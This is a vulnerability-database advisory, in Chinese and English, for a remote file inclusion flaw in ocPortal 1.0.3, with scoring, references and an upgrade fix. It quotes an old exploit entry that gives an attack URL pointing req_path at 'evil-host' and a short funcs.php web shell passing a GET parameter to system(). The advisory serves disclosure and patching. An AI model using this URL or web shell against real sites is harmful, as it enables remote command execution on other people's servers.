发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:57:12

[原文]PHP remote file inclusion vulnerability in index.php in ocPortal 1.0.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the req_path parameter to reference a URL on a remote web server that contains a malicious funcs.php script.

[CNNVD]OCPortal Content Management System远程文件包含漏洞(CNNVD-200412-129)

        ocPortal 1.0.3及其早期版本的index.php存在PHP远程文件包含漏洞。 远程攻击者可以通过修改引用了包含恶意funcs.php脚本远程服务器的URL的req_path参数执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20041012 [hackgen-2004-#002] - Remote file inclusion bug in ocPortal 1.0.3.
(PATCH)  BID  11368
(UNKNOWN)  XF  ocportal-reqpath-file-include(17699)

- 漏洞信息

OCPortal Content Management System远程文件包含漏洞
高危 输入验证
2004-12-31 00:00:00 2006-09-28 00:00:00
        ocPortal 1.0.3及其早期版本的index.php存在PHP远程文件包含漏洞。 远程攻击者可以通过修改引用了包含恶意funcs.php脚本远程服务器的URL的req_path参数执行任意PHP代码。

- 公告与补丁

        The vendor has released an upgrade dealing with this issue.
        ocPortal Web Content Management System 1.0
        ocPortal Web Content Management System 1.0.1
        ocPortal Web Content Management System 1.0.2
        ocPortal Web Content Management System 1.0.3

- 漏洞信息 (574)

ocPortal 1.0.3 Remote File Inclusion (EDBID:574)
php webapps
2004-10-13 Verified
0 Exoduks
N/A [点击下载]
http://localhost/ocp-103/index.php?req_path=http ://evil-host/

On your evil host you must put scipt funcs.php.

Example of funcs.php if your host doesn't support php.


     $com = $_GET["com"];

     system ("$com");


  Example of funcs.php if your host support php.


     echo '<?php $com = $_GET["com"]; system ("$com"); ?>';



# [2004-10-13]

- 漏洞信息

ocPortal index.php req_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

ocPortal contains a flaw that may allow a malicious user to execute arbitrary commands. The issue is due to a lack of sanitization on input provided to the req_path variable as part of the index.php script before it uses the input to include files. This allows a remote attacker to specify a custom PHP file on any server and have the commands be executed by the ocPortal system.

- 时间线

2004-10-13 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.04 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者